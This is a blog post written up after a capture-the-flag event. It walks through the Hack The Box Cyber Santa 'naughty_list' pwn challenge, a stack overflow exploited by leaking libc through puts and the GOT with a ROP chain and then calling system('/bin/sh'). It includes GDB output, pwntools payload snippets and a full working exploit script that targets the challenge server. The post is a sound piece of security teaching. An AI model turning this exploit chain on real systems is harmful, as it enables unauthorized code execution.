Monday, December 6, 2021

Hack The Box Cyber Santa CTF - Pwn Day 3 - Naught List Writeup

 


Challenge Files:  pwn_naughty_list.zip

  •     13320  2021-11-17 11:42   naughty_list
  •   2030928  2021-11-17 11:42   libc.so.6

Exploitation Techniques:  Return Oriented Programming (ROP) to leak GOT address to calculate the base address of where the libc file is loaded into memory.  Return-to-libc (ret2libc) to get a shell by executing system(address_to_"/bin/sh") from the addresses in the provided libc.so.6 file, also known as Return-to-system (ret2system).

Protections Defeated:  Bypassed ASLR, Bypassed No-Execute (NX) bit

Details:
The first thing to do is get a snapshot of the challenge with file and checksec:

naughty_list: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=01bfbb5590fb022140bbaaae3d3ba8ed2a8b57ba, not stripped
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)    # The function addresses are as is for easy tracking

NX is enabled, so we can't inject shellcode.  They provided a libc file, so if we can find/leak/calculate the libc base address, we can win.  Running the binary, we get a blindly colorful menu system that asks us 4 personal questions, then exits.  Naturally, I said I was 100 years old.


Our goal now is to figure out which of these input fields gives us a buffer overflow so we can get to some pwning.  Looking through the decompiled code in Ghidra, we found our buffer overflow in the get_descr() function where it asks us what gift we want.  The read() function tries to squeeze 960 bytes into a buffer of 32 bytes:


Time to see how many A's it takes to overwrite the saved RIP.  I loaded up Pwntools and made GDB attach to the process with a breakpoint at the return address at the end of the get_descr() function so we can track what address it returns to:

gdb.attach(p, '''
break *get_descr+81
c
''')

The buffer is 32 bytes, and the next 8 bytes is always RBP, so RIP should be 8 bytes after; therefore, I received the first three questions and sent back answers to them, and sent this payload to the "Name of the gift" question:

# Thousand C's to see how much we can write on the stack after RIP
payload = "A"*40 + "B"*8 + "C"*1000    
p.sendline(payload)

GDB confirmed the B's (0x42's) showed up in saved RIP.  I also checked to see how many C's made it onto the stack, and good news, it's quite a few!  (912 C's to be exact, more than enough for any ROP-ing).

gef➤  info frame
Stack level 0, frame at 0x7ffdcc449508:
 rip = 0x40107c in get_descr; saved rip = 0x4242424242424242

gef➤  x/300g $rsp
0x7ffdcc449508: 0x4242424242424242      0x4343434343434343
0x7ffdcc449518: 0x4343434343434343      0x4343434343434343
                                        ...
0x7ffdcc449888: 0x4343434343434343      0x4343434343434343
0x7ffdcc449898: 0x4343434343434343      0x0000000000000002

Now we have the B's as a placeholder for an address to jump to.  Our end goal is to call the system() function using the address in the provided libc file with one argument as the address to the "/bin/sh" string located in the libc file.  However, we don't know what the address of where libc is loaded into memory; therefore, we don't know the system() or "/bin/sh" address.

So, if we can leak any libc addresses, we can use that to calculate everything else.  Specifically, if you can leak the address of a libc function that's being used in the binary, you can subtract it's tiny offset in an objdump of the libc file from the leaked address to locate the first beginning address of the libc file in memory (a.k.a. libc base address).  Let's figure out how to ROP chain ourselves into leaking a libc address.

Leaks require any functions we can use to output the leak onto the screen.  This binary has puts, printf, and fwrite.  The best function to use is puts() because it requires on argument of what to output to the screen.  Next, what argument would we feed into puts to leak onto the screen?

The GOT (Global Offset Table) section of a binary maps out a libc function to it's exact lib address being used in memory for a specific run of the binary.  With ASLR enabled, the in-memory libc address changes with each run.  In GDB with the GEF plugin, you can view the GOT addresses with the got command:

gef➤  got

GOT protection: Full RelRO | GOT functions: 14

[0x601f80] toupper@GLIBC_2.2.5  →  0x7ffff7e1fa10
[0x601f88] puts@GLIBC_2.2.5  →  0x7ffff7e60210
[0x601f90] strlen@GLIBC_2.2.5  →  0x7ffff7f49220
[0x601f98] printf@GLIBC_2.2.5  →  0x7ffff7e41dc0
[0x601fa0] memset@GLIBC_2.2.5  →  0x7ffff7f4c6a0
[0x601fa8] alarm@GLIBC_2.2.5  →  0x7ffff7eb4d90
[0x601fb0] read@GLIBC_2.2.5  →  0x7ffff7ed88b0
[0x601fb8] srand@GLIBC_2.2.5  →  0x7ffff7e2a0d0
[0x601fc0] strcmp@GLIBC_2.2.5  →  0x7ffff7f44750
[0x601fc8] time@GLIBC_2.2.5  →  0x7ffff7fd0970
[0x601fd0] setvbuf@GLIBC_2.2.5  →  0x7ffff7e608f0
[0x601fd8] __isoc99_scanf@GLIBC_2.7  →  0x7ffff7e431b0
[0x601fe0] fwrite@GLIBC_2.2.5  →  0x7ffff7e5f120
[0x601fe8] rand@GLIBC_2.2.5  →  0x7ffff7e2a7f0

The left side is the local binary address.  Since PIE is disabled, this address stays the same with each run, and if we print out that local binary GOT address, you end up printing out the libc address it points to for that specific function.  We'll use the puts() function to print out the GOT entry for the puts() function call.  So this is our goal to leak like this:

puts(<puts_GOT_address>)    # From the table above, puts(0x601f88)

In order to feed in the puts GOT address as an argument, we need to put it in the RDI register.  In 32-Bit binaries, the function arguments are pulled from the next thing on the stack, but in 64-bit binaries, function arguments are pulled from the registers in this order:

Argument 1:  RDI
Argument 2:  RSI
Argument 3:  RDX
Argument 4:  RCX
Argument 5:  R8
Argument 6:  R9

So we need to POP the GOT address from the stack into the RDI register with a "gadget" that performs "pop rdi" followed by a "ret" so it can return to another custom address we control from our payload on the stack.  Good thing we control what goes into the stack through our payload (the 912 C's we were able to inject earlier).

A ROP "gadget" is any assembly instruction followed by a return, or call, or jump.  The true definition of a gadget goes further than that where the gadgets are created by combining various opcodes together to form instructions that weren't originally intended to be there, but for the sake of solving this challenge, we'll keep it simple.  There are many ways you can find ROP gadgets in the binary.  Popular tools are Ropper, ROPgadget, and Pwntools (we're going to use Pwntools), but here's how you find ROP gadgets in the binary from the command line using ROPgadget.  We want to pipe it into grep or output it to a file, then grep that because the results could be massive:

ROPgadget --binary naughty_list | grep "pop rdi"
    0x0000000000401443 : pop rdi ; ret 

Bam!  We found a "pop rdi" gadget!  You could manually use this address in your payload, but it'll be more seamless to find this gadget in Pwntools.

elf = ELF("./naughty_list")       # Extract data from binary
rop = ROP(elf)                          # Find ROP gadgets
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] 

It automatically searches the binary for the given "pop rdi; ret" gadget and stores it's address in a variable, so if we overwrite RIP and put this POP_RDI gadget's address there, then we jump the line of Assembly code that executes "pop rdi" and ends with "ret", in which it will return to the next address we put in our payload.  That chain of it going from one set of instructions and RETURNING to the next address we have in the payload is called ROP Chaining.  ROP-ing is basically writing a bunch of RIP addresses, one after another in sequence like firecracker when they go off.

Anyways, in our scenario, as a reminder, we're trying to execute this to leak the libc address for the puts function in this manner:  

puts(<GOT_address_for_puts>)

Starting our ROP chain in our payload accomplishes this after we pop the GOT address into RDI, then return from the POP RDI gadget directly into the puts PLT address.  PLT stands for the "Procedure Linkage Table", which is an address to a tiny stub of code (usually about 3 lines), that looks up the GOT address and calls the libc puts() address to execute it.

PUTS_PLT = elf.plt['puts']
PUTS_GOT = elf.got['puts']
payload = "A"*40 + p64(POP_RDI) + p64(PUTS_GOT) + p64(PUTS_PLT)
p.sendline(payload)
received = p.clean(timeout=1)[-8:].strip()    # Receives everything, capture the last 8 bytes as leak
print("Raw leaked bytes: %s" % received) 
leak = u64(received.ljust(8, "\x00"))        # Converts the raw leaked bytes into hexadecimal
print("Leaked libc address, puts: %s\n\n" % hex(leak))

It ends up looking like this.  I printed out the raw bytes, as well as it being converted to hex for clarity:

However, since ASLR is always enabled on a remote server, as well as all modern systems in general, that address leak will change with each run, so the way to preserve that leaked address so we can actually use it for our final payload is to have the program loop back to the beginning and start again without exiting; thus, allowing us to buffer overflow it AGAIN a second time when it reaches the same vulnerable point.  We accomplish this by putting the address to the MAIN PLT, which is the address to execute the top of main again.  Remember our continuing ROP chain.  After the PUTS PLT function gets called to do our leak, it has to return to something!  So we overwrite THAT RIP return with the MAIN_PLT as the next link in the chain like this to have the program start over WITHOUT EXITING to preserve our leaked address:

MAIN_PLT = elf.symbols['main'] 
rop1 = "A"*40 + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) 

Now that we get a second chance to overwrite RIP again, where do we want to jump to?  What's our next goal?  The final goal is to use our leaked puts libc address to calculate the libc base address to find the system's libc function address and execute this to get us a tasty shell:

system(<address_to_'/bin/sh'>)

Remember, the challenge zip file came bundled with the remote target's libc.so.6 file.  However, every Linux system uses a different libc version, so the function addresses will be different with each version.  Since we're testing this on our local Kali system, we have a different libc version as the targets as well!  So we can't yet use the included libc file.  We need to use our local Kali's libc file, and you can see what that is with "ldd".  You could use the full path to the local Kali's libc file, but I personally like to copy it to my local directory for easy access:

$ ldd naughty_list
            libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fa89c77d000)
$ cp /lib/x86_64-linux-gnu/libc.so.6 kali_libc

Now we load that libc file into our Pwntools and calculate the following addresses for our final ROP chain:

libc = ELF("kali_libc")
libc.address = leak - libc.symbols['puts']
BINSH = next(libc.search("/bin/sh"))     # Locate the address to the string "/bin/sh" in libc file
SYSTEM = libc.sym["system"]
EXIT = libc.sym["exit"]

The way we calculate the libc base address is this.  If we disassemble the libc file using objdump (with Intel syntax cuz AT&T assembly syntax is disgusting), and search for the puts function call address, we get this offset:

objdump -M intel -d kali_libc | grep "puts@"
0000000000076210 <_IO_puts@@GLIBC_2.2.5>:

Notice the last 3 characters of that offset looks exactly like the last 3 characters of the address it was loaded to in memory:  0x7f5226ca9210

Now if we subtract the tiny libc offset from the bigger address, we get the libc base address, which is line 1 of the libc file.  From there, we can calculate our way into ANY address in the libc file by adding it's offset to this base address.  Hence this line a couple lines up that accomplishes this in Pwntools:

libc.address = leak - libc.symbols['puts']

You'll also see from the code above that we also used this libc base address to calculate the address for where the string "/bin/sh" is stored in the libc file, the system() function's address, and the exit() function's address.  The reason we got the exit function's address is because when we exit our shell, we want it to exit gracefully with a real exit instead of crashing; although this is completely optional!  I like to keep a clean house.  Oh, I also noticed sometimes I need to calculate the address the a single "ret" instruction on it's own and ROP to it immediately before calling the system() function to align the stack.  Locally, it doesn't matter, but most of the time, the remote target's stack is unaligned and require this extra "ret" to call the system() function correctly:

ret = (rop.find_gadget(['ret']))[0]

 Okay!  We finally have all the pieces to put together the final ROP chain!  Similar to how we popped the puts GOT address into RDI as argument 1, this time, we pop the "/bin/sh" string's address into RDI as argument 1 to system().  And it looks like so:

payload = "A"*40 + p64(POP_RDI) + p64(BINSH) + p64(ret) + p64(SYSTEM) + p64(EXIT)
p.sendline(payload)
p.interactive()    # Need this to have an interactive shell so we can talk back and forth

AND HERE WE HAVE IT!  Our beautiful shell and flag! 


HTB{u_w1ll_b3_n4ughtyf13d_1f_u_4r3_g3tt1ng_4_g1ft}

APPENDIX (Full Exploit Code):
--------------------------------------------------------------------------------------------------------------------
from pwn import *

local_bin = "./naughty_list"
p = remote('178.62.5.61', 31365)
print(p.recvuntil(': ', timeout=1)) # Enter your name
p.sendline("RoarRibbit")
print(p.recvuntil(': ', timeout=1)) # Enter your surname
p.sendline("RoarRibbit")
print(p.recvuntil(': ', timeout=1)) # Enter your age
p.sendline("100")
print(p.recvuntil(': ', timeout=1)) # Name of gift you want?

# Gather instruction addresses
elf = ELF(local_bin) # Extract data from binary
rop = ROP(elf) # Find ROP gadgets
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0]
ret = (rop.find_gadget(['ret']))[0]
PUTS_PLT = elf.plt['puts']
FUNC_GOT = elf.got['puts']
MAIN_PLT = elf.symbols['main']
log.info("Main start: " + hex(MAIN_PLT))
log.info("puts plt: " + hex(PUTS_PLT))
log.info("pop rdi; ret  gadget: " + hex(POP_RDI))

# Create ROP chain to leak puts GOT address
rop1 = "A"*40 + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
print(p.clean()) # clean socket buffer (read all and print)
p.sendline(rop1)
p.recvline(timeout=1).strip()
p.recvline(timeout=1).strip()
received = p.recvline(timeout=1).strip()
print("Received: '%s'" % received)
leak = u64(received.ljust(8, "\x00"))
log.info("Leaked libc address, puts: "+ hex(leak))

# Start from the beginning of the program
print(p.recvuntil(': ', timeout=1)) # Enter your name
p.sendline("RoarRibbit")
print(p.recvuntil(': ', timeout=1)) # Enter your surname
p.sendline("RoarRibbit") 
print(p.recvuntil(': ', timeout=1))     # Enter your age
p.sendline("100")
print(p.recvuntil(': ', timeout=1))     # Name of gift you want?

# Calculate LIBC addresses for system(address_to_"/bin/sh")
libc = ELF("libc.so.6")
libc.address = leak - libc.symbols['puts']
log.info("libc base @ %s" % hex(libc.address))

# Find offsets in the libc file
BINSH = next(libc.search("/bin/sh")) #Verify with find /bin/sh
SYSTEM = libc.sym["system"]
EXIT = libc.sym["exit"]
log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM))

# Return-to-libc
payload = "A"*40 + p64(POP_RDI) + p64(BINSH) + p64(ret) + p64(SYSTEM) + p64(EXIT)
p.sendline(payload)

p.interactive()
--------------------------------------------------------------------------------------------------------------------

No comments:

Post a Comment